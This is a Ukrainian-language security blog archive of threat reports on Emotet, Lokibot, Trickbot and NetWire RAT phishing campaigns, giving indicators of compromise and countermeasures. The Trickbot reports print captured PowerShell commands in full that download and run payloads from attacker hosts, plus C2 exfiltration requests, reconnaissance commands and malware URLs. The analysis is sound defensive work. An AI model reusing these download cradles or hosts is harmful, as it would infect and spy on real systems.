Tag Archive | macro

Хитрий emotet

Люди, котрі заробляють на життя фішингом/розповсюдженням malware постійно вдосконалюють свої навички.

Ті, хто захищають інформаційні системи, повинні швидко адаптуватися під зміни методів доставки.

 

Сьогодні я розкажу вам про трюк, який дозволяє актуальним приманкам обходити _деякі_ sandbox.

А для тих, хто дочитає до кінця, буде бонусний контент ;)

Вступ

PowerShell вже кілька років є улюбленим помічником зловмисників для завантаження та запуску payload.

З 2017го року, відсоток приманок, що застосовують PowerShell тільки збільшується.

З початком 2019го року я стикнувся з тим, що на одній із моїх тестових машин приманка із макросом не відпрацювала повний цикл.

 

Суть

Отже це був черговий зразок банківського трояну #emotet.

В якості приманки використали XML файл із макросом, який мав передати на powershell інструкції – де взяти payload, куди завантажити і як запустити.

Але під час динамічного виконання послідовність команд дивним чином обривалася:

Я не міг збагнути, чому інфікування не проходить.

Отже я спробував скопіювати перехоплений рядок обфускованих інструкцій і запустити його через cmd вручну:

Виявилося, що виконання математичних операцій із масивами (досить поширений варіант обфускації) саме на цій тестовій системі

призводило до генерування команди із помилкою – ‘powershtll’ замість ‘powershell’:

Через це послідовність атаки і зупинялася.

Що ж, принаймні тепер я мав адреси джерел payload, які одразу ж перевірив:

Вони навіть не приховали payload під виглядом графічного файлу (так як це роблять при розповсюдженні #shade).

Отримавши зразки payload я одразу ж перевірив їх на приналежність конкретного виду за допомогою сервісу INTEZER Analyze:

Але мені не давало спокою, чому ж той скрипт із приманки не відпрацював докінця?

Кілька хвилин моніторингу і я знайшов причину у дописі My Online Security ‏ @dvk01uk

Як виявилося, скрипт не відпрацював через застарілу версію PowerShelll.

Справа у тім, що на Windows 7 PS не оновлюється автоматично.

А інструкції, які були у коді макросу, використовували змінні, котрі не працюють на версіях старіших за 5-ту.

 

Мій трюк (костиль)

Оскільки замовнику необхідно було надати перелік маркерів (IOC) якнайшвидше, я не став витрачати час на заміну тестового середовища

чи оновлення PowerShell.

Ось що я зробив – я знав, що команда обривається через помилку і назві запускного файлу powershell.

Мені потрібен був аліас на powershtll який би викликав powershell.

За допомогою google я згадав про таку корисну функцію як DOSKEY і нашвидкоруч створив аліас:

Це дало мені змогу запустити процес виконання скрипту і отримати результат:

Так, це костиль. І для іншого зразка із зміненою обфускацією він не працюватиме.

Але це дозволило мені вкластися у штатні 40 хв на аналіз зразка і надати замовнику маркери – https://pastebin.com/D9TDts5J.

– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –

Отже мораль цієї історії наступна – подбайте про оновлення ваших тестових ВМ у sandbox

та переконайтеся, що актуальні схеми обфускації відпрацьовують схему інфікування до кінця.

Інакше ви ризикуєте пропустити загрозу і втратити дані із скомпрометованої системи.

Висновки

  • PowerShell і надалі будуть застосовувати для доставки і запуску malware
  • На тестових Windows 7 потрібно оновити PS до 5ї версії
  • Варто очікувати нових способів обфускації
  • Від так необхідно обмежувати запуск вбудованих інструментів Windows для простих користувачів

PS

– – –  // Бонусний контент для уважних та допитливих

McAfee створило непогане відео про #emotet в якому показали як правилами Access Protection вберегти користувачів від зараження

Користуйтеся:

– – –  // Бонусний контент для уважних та допитливих

Будьте уважні та обережні.

VR

Advertisements

IOC_Emotet_091118

09/11/18 проходила розсилка троянського шкідливого коду типу #Emotet
Метод доставки – документ із макросом з передачею команд на powershell.
Ступінь загрози – високий (для компаній, що не блокують макроси).

  • Сильна обфускація команд.

5 різних джерел, три із них поки що активні:

h11p\мягкое-стекло{.} рф/OYRECjhJU  404
h11p\sastudio{.} co/GgGV3mOVlN           200
h11p\priscawrites{.} com/tS6M2ffhC       200
h11p\gbsbrows{.} com/JZLqJd4                200
h11p\evelin{.} ru/fgARtN6g                       404

Мережеві маркери:
– – – – – – – – – – – – – – – – – –
132.148.254.223 gbsbrows{.} com GET /JZLqJd4 HTTP/1.1 no User Agent
187.163.174.149 187.163.174.149:8080 GET / HTTP/1.1 Mozilla/4.0
# # #

Більше маркерів (чорновик звіту) за посиланням:
https://pastebin.com/THHMs2wg

Додаткові маркери по іншим розсилкам:

https://pastebin.com/KVNyw9Uq

https://pastebin.com/L2nSzNU4

Контрзаходи:

  • Заборонити виклик/передачу команд на cmd та powershell від додатків MS Office
  • Блокувати на proxy запити з пустим або нетиповим полем User Agent
  • Заборонити на proxy завантаження додатків
  • Контролювати створення/запуск .exe у профілях користувачів

Будьте уважні та обережні.

VR

IOC_lokibot_161018

16/10/18 проходила розсилка #lokibot

Схема:
email > attach XLS > VBA > powershell > GET > %userprofile%\MyP8Mihuih.exe

Мережеві маркери:
– – – – – – – – – – – – – – – – – –
181.174.165.161 octap{.} igg{.} biz GET /01/chri1.jpg HTTP/1.1 (!) no User Agent
103.109.184.60 octone{.} igg{.} biz POST /chri1/cgi.php HTTP/1.0 (!) Mozilla/4.08 (Charon; Inferno) < #Lokibot User Agent
# # #

Більше маркерів (чорновик звіту) за посиланням:
https://pastebin.com/LPqjHUkQ

Контрзаходи:

• Блокуйте запуск макросів
• Контролюйте нетипові виклики powershell
• Контролюйте трафік powershell
• Забороняйте/контролюйте створення .exe у C:\Users\
• Блокуйте на Proxy нетипові User Agent.

Будьте уважні та обережні.

VR

malware

Невивчені уроки або логи антивірусних війн

12/07/18 доповідав про наші досягнення у розрізі аналізу шкідливого коду та методів його доставки.

Контент суто технічний. Без прив’язки до конкретних вендорів чи рішень.

Презентацію можна переглянути/взяти тут

Основні тези:

  • Поточні ситуація по атакам (масові)
  • Гучні атаки 2017го (wcry, xdata, eternalpetya, badrabbit…)
  • Не правильні висновки
  • Реагування на інциденти
  • Технічні моменти захисту

Розповів про типові помилки при реагуванні на інциденти та навів приклади дієвих контрзаходів.

Кому зі slideshare не зручно – беріть у вигляді pdf (~4 Mb)

Сподіваюсь, знання стануть у нагоді.

Будьте уважні та обережні.

VR

IOC_Trickbot_110618

Доброго ночі, панове.

Перепрошую, що турбую в неробочий час, але інформація важлива.

В минулий понеділок, 11го числа, після обіду походила розсилка документів з макросами,

активація яких призводила до інфікування систем трояном типу #Trickbot.

Ми отримали зразок фішингового листа від однієї з компаній лише кілька годин тому:

Приманка досі функціонує, а основне тіло активно передає інформацію з інфікованих систем.

Шість днів поспіль вони продовжують збирати інформацію.

Так, уже майже усі антивіруси внесли і документ і payload в свої сигнатури.

Але ми дбаємо про вас, тому вирішили надати звіт із маркерами щоб ви могли пересвідчитися, що ваші системи ця зараза оминула.

Нагадую, що #Trickbot є модульним ШПЗ, яке використовується для збору даних та стеження.

Може довантажувати різні модулі для шифрування або віддаленого керування.

Рівень загрози, для організацій котрі не блокують макроси та не контролюють PowerShell і створення .exe, – високий.

А для тих, хто уважно читає наші поради – низький.

На що треба звернути увагу:

  • Один із серверів, що розповсюджує частини malware досі активний
  • Завантаження payload силами powershell через його виклик з cmd
  • Шлях та ім’я з яким записується і запускається downloader чітко вказані (not random)
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Виконання проходить із затримкою ~2-3 хв
  • Зразок не зачищає за собою файли у %temp% після міграції в %apdata%
  • Перевірку IP та звернення до Windows Update здійснює процес Oeuin_r.exe
  • Зразок також довантажує з windowsupdate.com кореневі сертифікати
  • А от передача зібраних даних уже через інжектований svchost
  • Прав Адміністратора не потребує

І так, проблеми будуть у тих, хто:

  • Не блокують макроси (90% державних установ)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • Не заборонили мережевий трафік для powershell (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

 Схема атаки:

Email attach (.doc) > macro > cmd > powershell > 2 URL > GET no.bin > %temp%\Oeuin_r.exe

Маркери IOC:

документ

SHA-256        5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
File name   75812277127A00113A.doc
File size      69 KB

Макрос містить 2 URL:

h11p:\onetimewonders{.} com/no.bin    (!) досі активний

h11p:\nepalhiking{.} com/no.bin           (404) файл вже видалено

сновна частина

SHA-256    503c5c3cb68e1e057df4b99fe338d65d44d4c6e1f49396929d3fff66044505af
File name   no.bin       >> %temp%\Oeuin_r.exe        !This program cannot be run in DOS mode.
File size      338 KB

Відкриває з’єднання із С2

h11p\188.124.167.132:8082/ser0611/hostname.UID

Активність по процесам:

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde

"C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function mhioxqxcz1([String] $lcambw5)

{(New-Object System.Net.WebClient).DownloadFile($lcambw5,''C:\tmp\Oeuin_r.exe'');

Start-Process ''C:\tmp\Oeuin_r.exe'';}try{mhioxqxcz1(''h11p\onetimewonders{.} c0m/no.bin'')}catch{mhioxqxcz1(''h11p\nepalhiking{.} c0m/no.bin'')}'""

| Out-File -encoding ASCII -FilePath C:\tmp\wcwwirbmn.bat;Start-Process 'C:\tmp\wcwwirbmn.bat' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\wcwwirbmn.bat" "

PowerShell  "function mhioxqxcz1([String] $lcambw5){(New-Object System.Net.WebClient).

DownloadFile($lcambw5,'C:\tmp\Oeuin_r.exe');

Start-Process 'C:\tmp\Oeuin_r.exe';}try{mhioxqxcz1('h11p\onetimewonders{.} c0m/no.bin')}catch{mhioxqxcz1('h11p\nepalhiking{.} c0m/no.bin')}

"C:\tmp\Oeuin_r.exe"

C:\Users\operator\AppData\Roaming\coplane\Oeuin_s.exe

C:\Windows\system32\svchost.exe

Збір інформації вбудованими засобами ОС:

C:\Windows\system32\cmd.exe /c ipconfig /all

C:\Windows\system32\cmd.exe /c net config workstation

C:\Windows\system32\cmd.exe /c net view /all

C:\Windows\system32\cmd.exe /c net view /all /domain

C:\Windows\system32\cmd.exe /c nltest /domain_trusts

C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts

Закріплення через планувальник задач:

\MsWinToken      c:\users\operator\appdata\roaming\coplane\oeuin_s.exe        11.06.2018 10:46

Мережеві IOC:

Завантаження основного тіла:

68.65.120.85      onetimewonders{.} c0m       GET /no.bin HTTP/1.1

Перевірка Public IP:

216.239.32.21    ipinfo.io     GET /ip      HTTP/1.1    Mozilla/5.0

Комунікація з Windows Update (довантаження кореневих сертифікатів):

91.223.19.232    www.download.windowsupdate.com       GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1   Microsoft-CryptoAPI/6.1

Трафік інфікованої системи:

svchost.exe 2948 TCP   216.239.32.21    80     ESTABLISHED

svchost.exe 2948 TCP   200.111.167.227 449   ESTABLISHED

svchost.exe 2948 TCP   91.223.19.232    80     ESTABLISHED

svchost.exe 2948 TCP   37.230.113.54    447   ESTABLISHED

svchost.exe 2948 TCP   200.111.167.227 449   ESTABLISHED

svchost.exe 2948 TCP   65.30.201.40      443   SYN_SENT

Передача інформації про інфіковану систему:

188.124.167.132:8082         POST /ser0611/hostname_UID HTTP/1.1 test

А тепер саме головне – яку інформацію отримують нападники:

POST /ser0611/APM11_W617601.66340B99AFAFEB9431CE688A2D6B8FF8/90 HTTP/1.1

Content-Type: multipart/form-data; boundary=Arasfjasu7

User-Agent: test

Host: 188.124.167.132:8082

Content-Length: 4941

Cache-Control: no-cache

–Arasfjasu7

Content-Disposition: form-data; name=”proclist”

 

***PROCESS LIST***

[System Process]

System

smss.exe

csrss.exe

wininit.exe

csrss.exe

winlogon.exe

services.exe

lsass.exe

lsm.exe

–Arasfjasu7

Content-Disposition: form-data; name=”sysinfo”

 

***SYSTEMINFO***

Host Name – APM11

OS Name – Microsoft Windows 7 ……………………..

OS Version – Service Pack 1

OS Architecture – 64-bit

Product Type – Workstation

Build Type – Multiprocessor Free

Registered Owner – operator

Registered Organization –

Serial Number – 55041-007-1767687-86688

Install Date – 30/12/1899 00.00.00

Last Boot Up Time – 30/12/1899 00.00.00

Windows Directory – C:\Windows

System Directory – C:\Windows\system32

Boot Device – \Device\HarddiskVolume1

Total Physical Memory – 3651 Mb

Available Physical Memory – 3651 Mb

/c ipconfig /all

Ethernet adapter eth0:

….

/c net config workstation

…… ………………..                                \\APM11

………… …… ………………..                         APM11

…… ……………………                              operator

/c net view /all

.. ………… …… ……………….

/c net view /all /domain

.. ………… …… ……………….

/c nltest /domain_trusts

…. ………….. …………………. ………….. …………: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

/c nltest /domain_trusts /all_trusts

…. ………….. …………………. ………….. …………: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

–Arasfjasu7–

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування несанкціонованої доставки запускних на рівні Web та Email шлюзів
  • Перевірка каталогів
    • %temp%\Oeuin_r.exe
    • %temp%\wcwwirbmn.bat
    • %appdata%\coplane\Oeuin_s.exe
  • Перевірка планувальника системи на наявність задачі \MsWinToken         c:\users\%жертва%\appdata\roaming\coplane\oeuin_s.exe
  • По можливості – відмова від макросів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_NetWire_RAT_250418

Доброго дня, панове.

Детальний звіт по сьогоднішній розсилці.

Цього разу через документи із макросами розповсюджували #NetWire RAT.

Цей тип шкідливого коду застосовується для віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі не блокують макроси, – високий, а для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Документ із макросом розмістили на Amazon AWS (знову, для обходу URL фільтрації)
  • Активація макросу відбувається при кліку на формі (Ок або “Х”)
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Завантаження та запуск основної частини відбувається процесом winword
  • Основна частина зберігається у %Public% (фактично обходять %Temp%)
  • Не потребує прав Адміністратора

Інфікування відбувається так:


І так, проблеми будуть у тих, хто:

  • Не заблокували макроси (90% держ. установ та фінансових департаментів)
  • Не заборонили трафік для winword.exe (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)


Схема атаки:

email > URL > GET .doc > maco > GET 84.200.19.153/pen.exe > users\public\.exe

Маркери IOC:

файл приманка

SHA-256    16947cceab56ad5c98a588a23c656b8fc967702d027f8f9a0164bfc2738fc2b6
File name   Transactions_invalid001.doc
File size      425.5 KB

основна частина

SHA-256        079e3875726e57824b5357583a9ba746c5775a60c6355f5cced8024652817699
File name   pen.exe
File size      412 KB

Мережеві IOC:

Документ завантажується із Amazon AWS: (Увага! Посилання досі активне!)

h11ps://secured-banking00129.s3.amazonaws{.} com/Transactions_invalid001.doc

Основна частина завантажується із:

84.200.19.153    GET /pen.exe HTTP/1.1         Mozilla/4.0

Трафік скомпрометованої системи після запуску основної частини:

185.117.74.8      49622 → 4590 [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1    TCP   66    

Активність по процесам:

Коли жертва відкриває завантажений документ-приманку запускається макрос.

Процес Winword відкриває з’єднання із 84.200.19.153 і намагається завантажити некодований payload.

Завантажений файл записується та запускається з каталогу %Public%

"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Users\operator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\...\pen[1].exe"
"C:\Users\Public\.exe"

Після запуску основна частина закріплюється через HKU:

[HKEY_USERS\S-xxx\Software\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Users\\Public\\.exe"
"printer"="C:\\Users\\Public\\.exe"

(Default)    c:\users\public\.exe     4/24/2018 4:12 PM     
printer      c:\users\public\.exe     4/24/2018 4:12 PM 

Після запуску зразок відправляє SYN пакети на порт 4590 хоста 185.117.74.8:

185.117.74.8      49622 → 4590 [SYN]

Контрзаходи:

  • Перевірити журнали обладнання на наявність спроб комунікації із s3.amazonaws{.} com
  • Заборонити запуск макросів, якщо не використовуєте по роботі
  • Заборонити мережевий трафік для додатків MS Office – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборонити запуск дочірніх процесів для додатків MS Office (крім служби друку) користувацьке правило Access Protection (McAfee ENS)
  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона створення та зчитування/запуску *.EXE файлів з каталогів профілю C:\Users\**\
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталозі C:\Windows\Temp\**
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_trickbot_280318

Доброго дня, панове.

Вчора проходила розсилка шкідливого коду типу #trickbot (розглядали в минулому році)

На відміну від попередніх розсилок тут і тут, цього разу – документи із макросами.

Рівень загрози (для організацій які досі не заблокували макроси) – середній.

Для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Макрос містить чітко вказане ім’я payload та два різні сервери завантаження
  • Основне тіло завантажується як зображення, хоча є некодованим додатком
  • Одразу після запуску перевіряє Public IP
  • Зупинка процесу призводить до перезапуску payload
  • Повторний запуск (інфікування) генерують нове ім’я payload проте шлях незмінний

Схема атаки:

email > Attach (.doc(x)) > Winword > cmd > Powershell > 
2 hardcoded URL >  $env:temp + '\ kizsgkv.exe

#1 Завантаження основного тіла:


#2 Закріплення в системі:


#3 Повторний запуск основного тіла


Маркери IOC:

документ приманка:

SHA-256        3782f96c6d9f3136651da208465fa939313b7e4f21bdc4ef10c05926e0428a65
File name   SecureMessage.doc
File size      62 KB

основна частина (джерела станом на 29те вже не працюють):

SHA-256    2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c
File name   svoren.png >> \Temp\kizsgkv.exe
File size      392 KB

Мережеві IOC:

завантаження payload – вже не дійсні

202.218.252.73   m-tensou{.} net  GET /svoren.png HTTP/1.1
202.169.44.149   interbanx{.} co.id        GET /svoren.png HTTP/1.1

трафік скомпрометованої системи

54.84.104.112    checkip.amazonaws{.}com   GET / HTTP/1.1   Mozilla/5.0
82.146.60.85      49642 → https(443) [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1  

Активність по процесам:

Відкриття документу призводить до активації макросу, який у свою чергу ініціює завантаження основної частини засобами Powershell

"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).DownloadFile($Mvurccbh,''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'');Start-Process ''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'';}try{Bcnfqi(''h11p:\m-tensou{.} net/svoren.png'')}catch{Bcnfqi(''h11p:\interbanx{.} co.id/svoren.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat;Start-Process 'C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat' -WindowStyle Hidden"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell  "'PowerShell ""function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).DownloadFile($Mvurccbh,''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'');Start-Process ''C:\Users\operator\AppData\Local\Temp\kizsgkv.exe'';}try{Bcnfqi(''h11p:\m-tensou{.} net/svoren.png'')}catch{Bcnfqi(''h11p:\interbanx{.} co.id/svoren.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat;Start-Process 'C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe cmd /c ""C:\Users\operator\AppData\Local\Temp\Vxxhpfqnsmql.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell  "function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).DownloadFile($Mvurccbh,'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe');Start-Process 'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe';}try{Bcnfqi('h11p:\m-tensou{.} net/svoren.png')}catch{Bcnfqi('h11p:\interbanx{.} co.id/svoren.png')}

Зміст .bat файлу

Vxxhpfqnsmql.bat
PowerShell "function Bcnfqi([String] $Mvurccbh){(New-Object System{.} net.WebClient).
DownloadFile($Mvurccbh,'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe');
Start-Process 'C:\Users\operator\AppData\Local\Temp\kizsgkv.exe';}
try{Bcnfqi('h11p:\m-tensou{.} net/svoren.png')}
catch{Bcnfqi('h11p:\interbanx{.} co.id/svoren.png')}

 Закріплення через планувальник задач

\MsNetMonitor                    c:\users\operator\appdata\roaming\netviewer\kiztgkv.exe  9/11/2016 7:57 AM   

 Відновлення в разі зупинки процесу

"C:\Users\operator\AppData\Local\Temp\kizsgkv.exe"
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe
C:\Windows\system32\svchost.exe -k netsvcs
taskeng.exe {DF877B3F-E8C0-424D-AF5E-43A877CA9BCB} S-1-5-21-2867606665-3356615968-442145759-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe
taskeng.exe {1E8FF255-2D23-4815-9E0C-10E2B16FF7A8} S-1-5-21-2867606665-3356615968-442145759-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\NetViewer\kiztgkv.exe

Контрзаходи:

  • Якщо для роботи макроси не є потрібними – деактивуйте їх (реєстр, GPO, параметри MS Office)
  • Заборона запуску дочірніх процесів для додатків MS Office (cmd, PowerShell etc)
  • Блокування доступу до мережі Інтернет для процесу PowerShell (варіант 1й) + cmd, + winword.exe (про всяк випадок)
  • Якщо ж PowerShell активно застосовується – нагадую про вбудовані можливості McAfee ENS – сигнатури Exploit Prevention
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю C:\Users\**\ !
  • Заборона виклику PowerShell через CMD
  • Контроль передачі запускних файлів по каналам Web та Email
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR